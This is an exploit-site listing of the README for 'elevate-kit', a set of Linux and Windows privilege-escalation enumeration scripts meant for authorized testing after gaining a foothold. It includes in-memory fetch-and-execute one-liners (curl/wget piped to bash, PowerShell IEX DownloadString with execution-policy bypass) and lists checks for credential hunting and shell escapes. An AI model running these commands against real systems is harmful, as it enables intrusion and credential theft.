Exploit for elevate-kit

Name: Exploit for elevate-kit
Rating: 5 (10 reviews)
2026-06-21 | CVSS 5.9
## https://sploitus.com/exploit?id=7CA75EAE-A0F0-5208-961E-2A8AB16A5A95
# elevate-kit

Local privilege escalation enumeration scripts for Linux and Windows.

Both tools assume you already have a foothold (a shell / session) on the target and
need to find the path from your current user to root / SYSTEM. They are read-only:
they enumerate and report, they do not modify the system or run exploits. Findings
that represent a real escalation vector are printed in red; areas that were checked
and found clean are printed in green.

## Disclaimer

For use only on systems you own or are explicitly authorized to test. Running these
scripts against systems without permission may be illegal. You are responsible for how
you use them.

## Output legend

Both scripts share the same severity markers:

| Marker     | Color  | Meaning                                              |
|------------|--------|------------------------------------------------------|
| `[CRIT]`   | red    | Direct or likely privilege escalation vector         |
| `[!]`      | yellow | Worth reviewing manually; potential, not confirmed   |
| `[+]`      | green  | Checked and clean — no escalation here               |

Color is enabled by default and disabled automatically when output is not a terminal.
Use `--no-color` / `-NoColor` to force it off (for example when piping to a file).

---

## Linux — linenum.sh

### Requirements

Bash and standard coreutils. Optional tools (`getcap`, `ss`, `ip`, `docker`, `kubectl`,
`curl`/`wget`) are used when present and skipped when not. No installation, no
dependencies to pull in.

### Usage

```sh
chmod +x linenum.sh
./linenum.sh                 # full scan, color output, report saved to ./linenum_/
./linenum.sh --quick         # skip slow filesystem-wide find searches
./linenum.sh --thorough      # deeper credential grep across /srv /usr/local /home
./linenum.sh -o report.txt   # also save a color-stripped copy to report.txt
./linenum.sh --no-color      # disable ANSI color
./linenum.sh --help
```

| Option            | Description                                                        |
|-------------------|-------------------------------------------------------------------|
| `-q`, `--quick`   | Skip the slow root-filesystem searches (SUID, world-writable, creds) |
| `-t`, `--thorough`| Widen the credential grep to more paths                           |
| `-o`, `--out FILE`| Write a color-stripped copy of the full output to `FILE`          |
| `--no-color`      | Disable color                                                     |
| `-h`, `--help`    | Show help                                                         |

When run as root, the writable-file checks are skipped automatically (every path looks
writable to root, so the results would be meaningless). Run it as the low-privileged
user you are trying to escalate from.

### Running from memory

If you cannot or do not want to drop the file on disk:

```sh
curl -s http:///linenum.sh | bash
# or
wget -qO- http:///linenum.sh | bash
```

### What it checks

- System information: kernel, architecture, distribution, shells, full `PATH`
- Kernel exploit suggestions: version-matched candidates (DirtyCow, DirtyPipe, nf_tables,
  PwnKit, Sudo Baron Samedit, glibc Looney Tunables, OverlayFS GameOver(lay)) with the
  relevant CVE for each — heuristic, meant to be verified
- Kernel hardening: stack protector, KASLR, strict RWX, `ptrace_scope`, runtime ASLR
- Users and sudo: UID 0 accounts, dangerous group membership (docker, lxd, disk, shadow,
  adm, sudo, wheel), `sudo -l`, readable sudoers, inline password hashes in `/etc/passwd`,
  logged-in users
- Environment variables, including secrets accidentally exported
- Installed languages and useful binaries
- SUID / SGID binaries, with GTFOBins shell-escape one-liners for the exploitable ones
- File capabilities (`getcap`): `cap_setuid`, `cap_dac_read_search`, `cap_sys_admin`, etc.
- Writable sensitive files (direct escalation surface): `/etc/passwd`, `/etc/shadow`,
  `/etc/group`, sudoers, `ld.so.preload` / `ld.so.conf.d`, `rc.local`, `init.d`,
  `profile.d`, cron directories, systemd units and `ExecStart` binaries, `update-motd.d`,
  and a writable `core_pattern`
- World-writable files and directories
- SSH: `sshd_config` exposure, readable private keys / `authorized_keys`, agent sockets in
  `/tmp`, credential hits in shell history and rc files (`.netrc`, `.git-credentials`)
- Credential hunting in config files, plus high-signal key/token patterns (AWS, Google,
  Slack, GitHub, private-key headers, JWTs) and database connection strings
- Backup, temp and version-control files
- Cron jobs, systemd timers, writable cron scripts and units
- Network: interfaces, routes, listening ports, loopback-only services, ARP, DNS, iptables
- NFS exports and `no_root_squash`
- Mounts, `fstab`, block devices, loaded kernel modules
- Containers: Docker / LXD group abuse, writable `docker.sock`, container detection
- Cloud metadata (IMDS) and on-disk cloud credentials
- Kubernetes service-account tokens and paths
- Processes running as root, secrets in process arguments, detached screen/tmux sessions

### Output

A summary is printed to the terminal. A full color-stripped log is written to a
timestamped directory (`linenum_/`), along with the raw lists for the larger
checks (SUID/SGID, world-writable files, candidate credential files) so you can grep
through them afterward.

---

## Windows — winenum.ps1

> In progress. The PowerShell counterpart of `linenum.sh`, using the same severity
> markers and the same red-for-vector / green-for-clean output.

### Requirements

Windows PowerShell 2.0 or later. Runs with normal user rights; no modules to install.

### Usage

```powershell
powershell -ExecutionPolicy Bypass -File .\winenum.ps1
.\winenum.ps1 -Quick
.\winenum.ps1 -Out report.txt
.\winenum.ps1 -NoColor
```

In-memory, without touching disk:

```powershell
IEX (New-Object Net.WebClient).DownloadString('http:///winenum.ps1')
```

| Option       | Description                                          |
|--------------|------------------------------------------------------|
| `-Quick`     | Skip the slower filesystem and registry sweeps       |
| `-Out FILE`  | Write a copy of the output to `FILE`                  |
| `-NoColor`   | Disable color                                         |
| `-Help`      | Show help                                             |

### What it checks

- System information: OS build, architecture, installed hotfixes and missing patches
- Token privileges (`whoami /priv`): `SeImpersonatePrivilege`, `SeAssignPrimaryToken`,
  `SeBackupPrivilege`, `SeRestorePrivilege`, `SeDebugPrivilege` and the techniques each enables
- Users, groups, and local administrators
- `AlwaysInstallElevated` policy (user and machine)
- Unquoted service paths
- Services with weak permissions and writable service binaries
- Writable directories in `%PATH%` and DLL hijacking candidates
- Scheduled tasks and their run-as context
- Autorun entries and startup locations
- Stored credentials: Credential Manager, `cmdkey`, autologon registry values, saved Wi-Fi keys,
  unattended install files, PowerShell history
- Readable `SAM` / `SYSTEM` / `SECURITY` hive copies and Volume Shadow Copies
- UAC configuration and integrity level
- Installed software and running processes
- AV and firewall state

### Output

Same as the Linux tool: severity-marked findings to the console, with an optional saved
copy via `-Out`.

---

## Notes

- Pair the SUID/SGID and capabilities output with [GTFOBins](https://gtfobins.github.io)
  to turn a flagged binary into a shell.
- For short-lived root processes and cron jobs that the static scan cannot catch, run
  [pspy](https://github.com/DominicBreuker/pspy) alongside it.
- `[!]` items are not failures — they are things the script cannot judge for you and that
  depend on context.

## License

MIT. No warranty. Use at your own risk.